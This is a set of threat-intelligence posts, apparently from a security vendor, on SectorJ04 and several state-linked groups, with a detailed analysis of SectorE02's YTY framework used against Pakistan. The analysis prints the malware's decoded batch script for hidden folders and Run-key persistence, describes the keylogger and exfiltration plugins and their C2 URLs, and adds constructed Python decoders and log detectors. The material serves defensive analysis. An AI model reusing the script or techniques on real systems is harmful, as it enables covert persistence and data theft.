FlawedAmmy RAT found in the hacking activity showed the existing “Ammyy Admin” string being modified to “Popss Admin” and created Mutex with “KLGjigjuw4j892358u432i5”. In addition, the compile path “c:\\123\\123\\clear\\ammyygeneric\\target\\TrFmFileSys.h” was found inside the file.

Figure 44 Change hard-coded string information in FlawedAmmy RAT
Figure 45 Mutex generation code using hard-coded string information

In addition to the changes above, the FlawedAmmy RAT found in the most recent activity also changed its string decoding routine.

Conclusion

The SectorJ04 group’s range of targets increased sharply in 2019, and they appear to be striving to carry out elaborated attacks while at the same time targeting indiscriminately. They are one of the most active cyber crime groups in 2019, and they often modify and tweak their hacking methods and perform periodic hacking activities.

The SectorJ04 group’s hacking activities are expected to continue to increase, and the ThreatRecon team will continue to monitor the attack activity against the group.

Indicators of Compromise

IoCs of the SectorJ04 group included in the report can be found here.

More information about the SectorJ04 group is available to customers of ThreatRecon Intelligence Service (RA.global@nshc.net).

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

Spearphishing Attachment
Spearphishing Link
Trusted Relationship

Execution

Command-Line Interface
Execution through API
Execution through Module Load
Exploitation for Client Execution
PowerShell
Rundll32
Scheduled Task
Scripting
Service Execution
User Execution
Windows Management Instrumentation

Persistence

Account Manipulation
New Service
Registry Run Keys / Startup Folder
Scheduled Task
Startup items
System Firmware
Windows Management Instrumentation Event Subscription

Privilege Escalation

Bypass User Account Control
New Service
Scheduled Task
Startup items

Defense Evasion

Bypass User Account Control
Code Signing
Disabling Security Tools
DLL Side-Loading
Exploitation for Defense Evasion
Hidden Window
Modify Registry
Obfuscated Files or Information
Rundll32
Scripting
Software Packing
Virtualization/Sandbox Evasion

Credential Access

Account Manipulation
Input Capture
Input Prompt

Discovery

Account Discovery
File and Directory Discovery
Network Service Scanning
Network Share Discovery
Permission Groups Discovery
Process Discovery
Query Registry
Remote System Discovery
Security Software Discovery
System Information Discovery
System Network Configuration Discovery
System Network Connections Discovery
System Owner/User Discovery
System Service Discovery
Virtualization/Sandbox Evasion

Lateral Movement

Remote Desktop Protocol
Remote Services

Collection

Automated Collection
Data from Local System
Email Collection
Input Capture

Command and Control

Commonly Used Port
Custom Command and Control Protocol
Custom Cryptographic Protocol
Data Encoding
Remote Access Tools
Standard Application Layer Protocol
Standard Cryptographic Protocol

Exfiltration

Automated Exfiltration
Data Compressed
Exfiltration Over Alternative Protocol
Exfiltration Over Command and Control Channel

Impact

Data Encrypted for Impact

References

KRCERT – Analysis of Attacks on AD Server (2019.04.17)
https://www.krcert.or.kr/data/reportView.do?bulletin_writing_sequence=35006

Monthly Threat Actor Group Intelligence Report, June 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from May 21 to June 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02, SectorA05 were found among SectorA hacking groups this June. The SectorA group was mainly active in the Middle East, Southeast Asia, and East Asia in June, targeting countries such as Jordan, Philippines, South Korea, and Japan.

The SectorA01 group mainly sent spear phishing emails to the Middle East and Southeast Asia which had Microsoft Office document files attached to them. However, in June, another case was discovered where they attached executable type malware that was disguised as a job application form.

The SectorA02 and SectorA05 groups are both active mainly for monetary profit, but based on their hacking techniques and malware features, each group aims at different targets. The SectorA02 group mainly targets financial companies or companies related to cryptocurrency trading, while the SectorA05 group targets individuals who hold cryptocurrency. In the past, the two groups used spear phishing emails with malicious HWP or executable files attached. Recently, they have also used spear phishing emails impersonating cryptocurrency exchanges or government agencies.

Recently, the SectorA groups have been acting in parallel to gather diplomatic information for their government and to gain monetary benefits. In the past, they mainly targeted financial companies and cryptocurrency exchanges for monetary benefit, but nowadays they have extended their range of targets to include individual holders of cryptocurrency. Attention is needed as their range of activities expands.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In June, a total of six SectorB hacking groups were found to be active. Activities of each group were found in the following countries: SectorB01 group activity was discovered in Southeast Asia and Europe, mainly in the Philippines, the Netherlands, and Ukraine. SectorB03 group activity was discovered in the Middle East, mainly in Saudi Arabia. SectorB04 group activity was discovered in East Asia, the Middle East and Europe, mainly in Taiwan, the Philippines, Turkey, and Austria. SectorB06 group activity was discovered in the Middle East and Central Asia, mainly in Turkey and Kazakhstan. SectorB09 group activity was discovered in East Asia and North America, mainly in Japan, Hong Kong, Taiwan and Canada. SectorB14 group activity was discovered in East Asia and North America, mainly in South Korea and the United States.

They maintain their existing hacking techniques – using Spear Phishing emails with malicious Microsoft Office document files attached. Recently, they also attacked Microsoft SharePoint servers and MySQL servers that are connected to the Internet using new vulnerabilities and web shells. In addition, new malware targeting the Linux operating system has been found.

In the past, SectorB groups focused more heavily on North America, but recently attacks in the Middle East, Southeast Asia and East Asia have also increased. We believe this is related to their recent political and diplomatic situations and it is likely that the hacking activities in the Middle East, Southeast Asia, East Asia will continue for the time being.

3. SectorC Activity Features

A total of three hacking groups, SectorC02, SectorC08 and SectorC11, were found among the SectorC groups in June. They were active mainly in Europe (Moldova, Ukraine and Germany), countries with which they frequently have political friction. They constantly use spear phishing emails carrying malware, but there are gradual changes in the characteristics of the attached executable files. They continue to use open source programs such as the UltraVNC remote control program and have started to build their malware from open source code. This is presumably done to bypass security solutions and analyst detection, and it also hampers intelligence efforts to track the attackers. SectorC groups are expected to continue hacking activities in countries with which they have political and diplomatic conflicts for the time being.

4. SectorD Activity Features

In June, a total of two hacking groups were found among the SectorD groups. They targeted countries in the Middle East with which they have a politically competitive relationship. SectorD02 group activity was discovered across a wide area, mainly in Hong Kong, Sweden, Tajikistan, the United Arab Emirates, Saudi Arabia, Iraq, Jordan, France, the United States and Mexico. SectorD11 group activity was discovered from Central Asia to the Middle East.

They are constantly using spear phishing emails with Microsoft Office document files attached. In particular, obfuscated macro scripts and PowerShell code are embedded in these document files to download additional malware. The SectorD11 group also develops and distributes malware that runs on Android smartphones for the purpose of monitoring civilians who oppose the SectorD government.

Currently, the SectorD hacking groups have increased the frequency of hacking activities against Western countries. This is mainly targeting the United States, which they have political and military disputes with, but also a pro-American nation in the Middle East. It is likely that the activities of SectorD hacking groups will be greatly dependent on how the US exerts its influence and military activities in the future.

5. SectorF Activity Features

The SectorF01 group was discovered performing hacking activities in Southeast Asia, Europe and North America, including Vietnam, United Kingdom and the United States. They have consistently used spear phishing emails with attached Microsoft Office document files, but recently attached compressed files containing obfuscated HTA script files as well. This bypasses the detection of security solutions using script-based malware and avoids making the target suspicious as it launches normal documents when running the HTA file.

Analysis of the recent hacking activity of SectorF01 shows they seem to have two purposes. The first is surveillance of organizations and individuals who are against their government. The second is the collection of high-tech info from advanced countries that are nurturing high-tech and industrial technologies, which assists their government’s economic development and upgrading purposes. Recently, the hacking activity of SectorF01 for the purpose of high-tech corporate espionage is increasing, and it is likely that their activities targeting high tech companies and countries will continue to increase in the future.

6. SectorH Activity Features

The SectorH01 group appears to be active as a contractor rather than belonging officially to a national security agency. Their hacking activities were found in South Asia and South America, including India and Brazil. They mainly use spear phishing emails with Microsoft Office document files attached.

In this case, macro scripts within the document files use PowerShell to download additional scripts from Pastebin (a text file storage site). This minimizes the exposure of their next-stage payload even if the initial malware is detected by a security solution, and can bypass detection by using an external, publicly reachable website to distribute their malware. The SectorH01 group's hacking activities were mainly carried out against their political competitor, India. However, recently their activities have been found in other regions, and we will continue monitoring them in order to further understand the purpose of the SectorH group.

7. Cyber Crime Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In June, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ01 group are mainly found in China, Germany, Slovenia, Sweden, Romania, Russia, US, Brazil, and Costa Rica. The SectorJ01 group uses Spear Phishing emails which have attached documents that utilize known code execution vulnerabilities in Microsoft Office. They also use Cobalt Strike, a common penetration testing tool.

The SectorJ04 group is one of the most active groups in recent years, and its activities have been found in a wide range of regions: Europe, Asia, North and South America, and Africa. Specific countries include Switzerland, Russia, Macedonia, France, Ukraine, Italy, Germany, South Korea, the Philippines, Taiwan, China, the USA, Ecuador, and Senegal.

Similar to the past, they use spear phishing emails which have attached Microsoft Office document files with embedded macro scripts that will download malware. Sometimes they use HTML file attachments too. Recently, the SectorJ04 group hacked organizations such as universities, manufacturing companies, and construction companies, so their targets were not limited to just financial companies anymore. They have also extended their activities to industrial areas, where the security posture is typically relatively weaker compared to financial companies, so this is one way they are attempting to generate high profits through low effort. As SectorJ04 group’s hacking targets are diversified, it is likely that many cases of financial losses will occur in various countries across many industries.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

SectorE02 Updates YTY Framework in New Targeted Campaign Against Pakistan Government

Overview

From March to July this year, the ThreatRecon team observed a spear phishing campaign by the SectorE02 group against the Government of Pakistan and organizations there related to defense and intelligence. The spear phishing emails carry Excel XLS files which ask the victim to enable macros; the macro then executes the downloader. Malicious document lures they have recently employed include a document purporting to be a registration form for the Pakistan Air Force.

Security advisory by the Pakistan government regarding targeted attacks

SectorE02 is a threat actor which targets countries in South Asia, especially Pakistan, since at least 2012. Their arsenal includes a modular framework researchers have dubbed the “YTY Framework”, which has a Windows and mobile version. Usage of this framework allows the SectorE02 group to constantly modify and even remake individual plugins of the framework, and pick and choose which plugins – if any – are sent to their victims. This modularity also allows the SectorE02 group to maintain low detections by antivirus engines because each module only does something simple and will not even work without certain previously dropped files. In this post, we will describe their lure document, first stage downloader, file plugin, screenshot plugin, keylogger plugin, and exfiltration uploader plugin.

Excel Spear Phishing

The excel file used by them had names such as Credit_Score.xls, Advance_Salary.xls, CSD_Schemes_2019.xls, and Agrani_Bank.xls. In some instances, it masqueraded as an Excel calculator from the National Bank of Pakistan.

Lure document 1

In later stages of the campaign, however, the group appeared to switch to using a MsgBox to show an error saying “This file is corrupted”.

Lure document 2

Behind the scenes, the Excel macro retrieves encoded data stored in the document itself. The encoding is a simple decimal encoding of each byte, with a comma (or exclamation mark) as the separator. The same encoding is used for the dropped executable, although more often a single encoded file is a ZIP archive containing two files, a batch script and an executable, which is unzipped and then executed.

All four files here are copies, shown for illustration, of the original “.txt”, “.pdf”, and “.inp” files, which are actually executable binaries

The dropped batch scripts follow the same basic format: creating folders with the hidden, system, and archive attributes, dropping the batch and executable files there, and setting persistence through either scheduled tasks or the autorun registry key. A text file containing the value of %COMPUTERNAME% and random digits is also saved as “win.txt”; the executable downloader requires this file to run.

A dump showing the scheduled task created by the batch script

The batch file that is dropped is used for three main purposes: 1) to set up the first folder, which is used to store the text file containing the computer name, 2) to set up what we call the “common exfiltration folder” which each individual plugin uses for different purposes, and 3) to set up persistence via scheduled task or registry run keys.

Example Decoded Batch File in XLS Doc
echo off
rd /s /q %USERPROFILE%\Printers\Neighbourhood\Spools
rd /s /q %USERPROFILE%\Print\Network\Server
rd /s /q %USERPROFILE%\DriveData\Files
rd /s /q %USERPROFILE%\DriveData\Wins
md %USERPROFILE%\Printers\Neighbourhood\Spools
md %USERPROFILE%\DriveData\Files
md %USERPROFILE%\DriveData\Wins
md %USERPROFILE%\Print\Network\Server
attrib +a +h +s "%USERPROFILE%\DriveData"
attrib +a +h +s "%USERPROFILE%\Printers"
attrib +a +h +s "%USERPROFILE%\Print"
SET /A %COMPUTERNAME%
SET /A RAND=%RANDOM% 10000 + 1
echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Files\win.txt
echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Wins\win.txt
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Files /f
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Wins /f
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v BigSyn /f
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Dataupdate /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Files /t REG_SZ /d %USERPROFILE%\DriveData\Wins\juchek.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Wins /t REG_SZ /d %USERPROFILE%\DriveData\Files\svchots.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v BigSyn /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssms.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v BigUpdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssmp.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Dataupdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\kylgr.exe
move %userprofile%\AppData\juchek.ttp %userprofile%\DriveData\Wins
ren %userprofile%\DriveData\Wins\juchek.ttp juchek.exe
del %0
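The decimal payload encoding and the persistence set up by the batch script, as an added example that is not code from the post or from the malware: a Python decoder for the comma- or exclamation-mark-separated byte values, plus a helper that pulls the Run-key values and hidden folders out of a decoded script. The sample batch text is constructed, modelled on the decoded script above, and the encoder exists only to build that sample.

```python
import re
from typing import Dict

def decode_decimal_payload(blob: str) -> bytes:
    """Decode the XLS macro's storage format: one decimal byte value per
    token, separated by ',' (or '!' in some documents). Blank tokens from
    trailing separators or line wrapping are skipped."""
    out = bytearray()
    for token in re.split(r"[,!]", blob):
        token = token.strip()
        if not token:
            continue
        value = int(token)
        if not 0 <= value <= 255:
            raise ValueError(f"not a byte value: {value}")
        out.append(value)
    return bytes(out)

def encode_decimal_payload(data: bytes, sep: str = ",") -> str:
    """Inverse of decode_decimal_payload; used here only to build the sample."""
    return sep.join(str(b) for b in data)

# Persistence artifacts left by the dropped batch script: Run-key values that
# point at the plugin binaries, and folders marked archive+hidden+system.
RUN_KEY_RE = re.compile(
    r'reg add "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" '
    r'/v (\S+) /t REG_SZ /d (\S+)', re.IGNORECASE)
ATTRIB_RE = re.compile(r'attrib \+a \+h \+s "([^"]+)"', re.IGNORECASE)

def extract_artifacts(batch: str) -> Dict[str, object]:
    """Pull host-based indicators out of a decoded batch script."""
    return {
        "run_keys": dict(RUN_KEY_RE.findall(batch)),
        "hidden_dirs": ATTRIB_RE.findall(batch),
    }

# Constructed sample (a few commands in the shape of the dropped batch file,
# not the full script from the post), CRLF-terminated as on Windows.
SAMPLE_BATCH = (
    "echo off\r\n"
    'attrib +a +h +s "%USERPROFILE%\\DriveData"\r\n'
    'reg add "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" '
    "/v Files /t REG_SZ /d %USERPROFILE%\\DriveData\\Wins\\juchek.exe\r\n"
    'reg add "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" '
    "/v Dataupdate /t REG_SZ /d %USERPROFILE%\\DriveData\\Files\\kylgr.exe\r\n"
    "del %0\r\n"
)
SAMPLE_ENCODED = encode_decimal_payload(SAMPLE_BATCH.encode("ascii"))

if __name__ == "__main__":
    decoded = decode_decimal_payload(SAMPLE_ENCODED).decode("ascii")
    print(decoded)
    print(extract_artifacts(decoded))
```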

Downloader (b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384)

Looking at the latest downloader executable, which disguises its filename as an InPage word processor document (bgfRdstr54sf.inp), it starts off by creating an event named “ab567” with CreateEventA as a mutex, and only runs if the file %USERPROFILE%\DriveData\Files\win.txt exists. It polls the C2 server roughly every 100 seconds, using the fixed user agent string “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”, and performs an HTTPS GET against servicejobs[.]life/orderme/<computername>-<random>.

This is a change from their previous URL structure, “/orderme”, which contained the file(s) to be downloaded, and it allows them to cherry-pick their victims: unless the SectorE02 operator specifically places the next stage malware in the server directory for a particular victim, that victim will only ever be infected with the downloader.

The downloader accepts three commands from the server, selected by the response's Content-Type header: “Content-Type: application”, “Content-Type: cmdline”, or “Content-Type: batcmd”. These are used to save files to disk or to execute files or commands on the system, which is how the next stage downloader or plugins are launched on the victim system.

Screenshot Plugin (f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5)

This executable plugin takes a screenshot every two minutes using the Windows API to draw the raw screen bitmap to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. It then converts this raw bitmap to a JPG in a new file and deletes the raw bitmap file.

Code in the screenshot plugin creating the raw bitmap

The screenshot files are named in the format of “tm_hour-tm_min-tm_sec-tm_year-tm_mday-tm_mon” [1].

Screenshot JPGs created by the screenshot plugin

Like some other YTY components, this plugin's obfuscated strings can be deobfuscated by applying base64 decoding and string reversal repeatedly (in this case, three times).

The strings can be deobfuscated by running both the base64 and reverse algorithm three times
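The string deobfuscation described above, as an added example in Python that is not code from the post or from the plugin. It assumes each layer is base64 encoding followed by reversal, so undoing one layer means reversing and then base64-decoding; the sample plaintext is the exfiltration folder path from this post and the obfuscated input is constructed from it.

```python
import base64
import binascii
from typing import Tuple

ROUNDS = 3  # the screenshot plugin applies the transform three times

def obfuscate(plain: str, rounds: int = ROUNDS) -> str:
    """Forward transform as modelled here (assumption): base64-encode, then
    reverse the string, repeated `rounds` times. Only used to build a sample."""
    data = plain.encode()
    for _ in range(rounds):
        data = base64.b64encode(data)[::-1]
    return data.decode()

def deobfuscate(obfuscated: str, rounds: int = ROUNDS) -> str:
    """Undo `rounds` layers: reverse the string, then base64-decode it."""
    data = obfuscated.encode()
    for _ in range(rounds):
        data = base64.b64decode(data[::-1], validate=True)
    return data.decode()

def peel_layers(obfuscated: str, max_rounds: int = 8) -> Tuple[str, int]:
    """Peel layers until the data stops decoding as base64 (or until
    max_rounds), returning the final text and the number of layers removed.
    Useful when a rebuilt plugin changes the round count. Caveat: a plaintext
    that happens to be valid base64 text would be peeled one layer too far;
    a layer that decodes to non-ASCII bytes is treated as that case."""
    data = obfuscated.encode()
    rounds = 0
    while rounds < max_rounds:
        try:
            decoded = base64.b64decode(data[::-1], validate=True)
        except (binascii.Error, ValueError):
            break  # not base64 any more: this is the plaintext
        if not decoded.isascii():
            break  # went one layer too far; keep the previous text
        data = decoded
        rounds += 1
    return data.decode(errors="replace"), rounds

# Constructed sample built from a path that appears in the post.
SAMPLE_PLAIN = "%USERPROFILE%\\Print\\Network\\Server\\"
SAMPLE_OBFUSCATED = obfuscate(SAMPLE_PLAIN)

if __name__ == "__main__":
    print(SAMPLE_OBFUSCATED)
    print(deobfuscate(SAMPLE_OBFUSCATED))
    print(peel_layers(SAMPLE_OBFUSCATED))
```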

File Listing Plugin (d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa)

This executable plugin recursively searches the “C:”, “D:”, “E:”, “F:”, “G:”, and “H:” drives for the file extensions of interest shown below, skipping several default folders.

Note that the “.inp” extension belongs to “Urdu InPage”, a word processing program that supports languages such as Urdu, the national language of Pakistan. The extensions that earlier versions of this plugin did not look for, and that the 2019 version adds, are “.odt” and “.eml”; “.rft” is simply a misspelling of “.rtf”.

The latest version of the plugin looks for files with any of 14 different file extensions

It only looks for files modified after 2017 and records every matching file as text in %APPDATA%\DriveData\Files\clist.log, using the format “File Path|Size WriteTimestamp l_flag”.

File path and names for exfiltration are saved to a clist.log file

Copies of the matching files are also saved to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. Each copy is named with the full path of the source file, with slashes replaced by underscores.

Exact copies of the files the plugin is looking for are saved to the common exfiltration folder

Keylogger Plugin (f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37)

This plugin starts off by creating an event named “k4351” with CreateEventA as a mutex. It saves keystrokes, together with the title of the window they were typed into, in the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. The file is saved as “<username>_YYYY_MM_DD(HH_mm_ss).txt”.

Example of input captured by the keylogger plugin

Uploader Plugin (d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e)

This plugin starts off by creating an event named “MyEvent3525” with CreateEventA as a mutex and only runs if the file %USERPROFILE%\DriveData\Files\win.txt exists. While the other plugins dump their files into the common exfiltration folder, the uploader plugin takes the files from that folder and uploads them to the C2 server, which is the same server the downloader uses. The uploaded files are deleted immediately afterwards.

The uploader performs an HTTP POST of the file to /upload/<computername> as form data, with the same hard-coded user agent as the downloader, “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”.

Data sent to the C2 server through HTTPS for exfiltration
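As an added example that is not part of the post, detection logic in Python for the downloader's GET /orderme/<computername>-<random> polling and the uploader's POST /upload/<computername>, run over constructed tab-separated proxy records. The record format, client IPs and timestamps are assumptions; the domains and User-Agent are the ones given in this post.

```python
import re
from typing import Dict, List, Tuple

# Fixed User-Agent shared by the YTY downloader and uploader (from the post).
YTY_USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
# C2 domains from the post's IoC list, written without defanging brackets.
KNOWN_C2_DOMAINS = {"servicejobs.life", "data-backup.online"}
# GET /orderme/<computername>-<random> and POST /upload/<computername>.
DOWNLOADER_PATH = re.compile(r"^/orderme/[A-Za-z0-9_-]+-\d+$")
UPLOADER_PATH = re.compile(r"^/upload/[A-Za-z0-9_-]+$")

def parse_line(line: str) -> Dict[str, str]:
    """Parse one constructed tab-separated proxy record (assumed format):
    timestamp, client IP, method, host, path, user-agent."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 6:
        raise ValueError(f"malformed record: {line!r}")
    keys = ("time", "client", "method", "host", "path", "user_agent")
    return dict(zip(keys, fields))

def classify(rec: Dict[str, str]) -> List[str]:
    """Return the reasons a record looks like YTY C2 traffic (empty if none).
    The User-Agent is a genuine Firefox 52 string, so on its own it is not a
    signal; it only counts together with the distinctive URL shapes."""
    reasons: List[str] = []
    if rec["host"].lower() in KNOWN_C2_DOMAINS:
        reasons.append("known SectorE02 C2 domain")
    ua_ok = rec["user_agent"] == YTY_USER_AGENT
    if ua_ok and rec["method"] == "GET" and DOWNLOADER_PATH.match(rec["path"]):
        reasons.append("downloader beacon URL pattern")
    if ua_ok and rec["method"] == "POST" and UPLOADER_PATH.match(rec["path"]):
        reasons.append("uploader exfiltration URL pattern")
    return reasons

def scan(lines: List[str]) -> List[Tuple[str, str, str, List[str]]]:
    """Return (client, host, path, reasons) for every suspicious record."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        reasons = classify(rec)
        if reasons:
            hits.append((rec["client"], rec["host"], rec["path"], reasons))
    return hits

# Constructed sample records (not from the post); 10.0.0.5 plays the infected host.
SAMPLE_LOG = [
    "2019-06-01T10:00:00Z\t10.0.0.5\tGET\tservicejobs.life\t/orderme/DESKTOP-7Q2-4821\t" + YTY_USER_AGENT,
    "2019-06-01T10:01:41Z\t10.0.0.5\tGET\tservicejobs.life\t/orderme/DESKTOP-7Q2-4821\t" + YTY_USER_AGENT,
    "2019-06-01T10:02:10Z\t10.0.0.5\tPOST\tservicejobs.life\t/upload/DESKTOP-7Q2\t" + YTY_USER_AGENT,
    "2019-06-01T10:03:00Z\t10.0.0.9\tGET\twww.example.com\t/index.html\t" + YTY_USER_AGENT,
    "2019-06-01T10:04:00Z\t10.0.0.9\tGET\tcdn.example.net\t/orderme/list-2019\tcurl/7.64.0",
]

if __name__ == "__main__":
    for client, host, path, reasons in scan(SAMPLE_LOG):
        print(client, host, path, "; ".join(reasons))
```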

Summary

While the use of a modular framework is not a new concept, the SectorE02 group's continuous remaking of YTY framework plugins that serve the same purpose allows them to keep detections by security tools to a minimum. Based on their campaigns and the plugins we have seen, we believe they may be recreating each plugin on a per-campaign basis, meaning that each campaign might use new binaries coded from scratch that are hardly detected by security tools. At the same time, their newfound caution in protecting their binaries from being downloaded, together with their limited targeting, means that the hardest part of detecting and responding to the SectorE02 group may be finding the related binaries in the first place.

Indicators of Compromise


YTY File Plugin

8fff7f07ebf0a1e0a4eabdcf57744739f39de643d831c36416b663bd243590e1
d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa

YTY Screenshot Plugin

f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5

YTY Keylogger Plugin

f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37

YTY File Exfiltration Uploader Plugin

d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e

IP Addresses

179[.]43[.]170[.]155
5[.]135[.]199[.]26

Domains

data-backup[.]online
servicejobs[.]life

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK techniques we have observed based on our analysis of this malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution

Persistence

T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1107 File Deletion
T1158 Hidden Files and Directories
T1066 Indicator Removal from Tools
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1064 Scripting

Credential Access

T1056 Input Capture

Discovery

T1010 Application Window Discovery
T1083 File and Directory Discovery
T1082 System Information Discovery
T1497 Virtualization/Sandbox Evasion

Collection

T1119 Automated Collection
T1005 Data from Local System
T1039 Data from Network Shared Drive
T1025 Data from Removable Media
T1074 Data Staged
T1114 Email Collection
T1056 Input Capture
T1113 Screen Capture

Command and Control

T1043 Commonly Used Port
T1071 Standard Application Layer Protocol

Exfiltration

T1020 Automated Exfiltration
T1041 Exfiltration Over Command and Control Channel

References

[1] Microsoft Docs | localtime, _localtime32, _localtime64
https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/localtime-localtime32-localtime64?view=vs-2019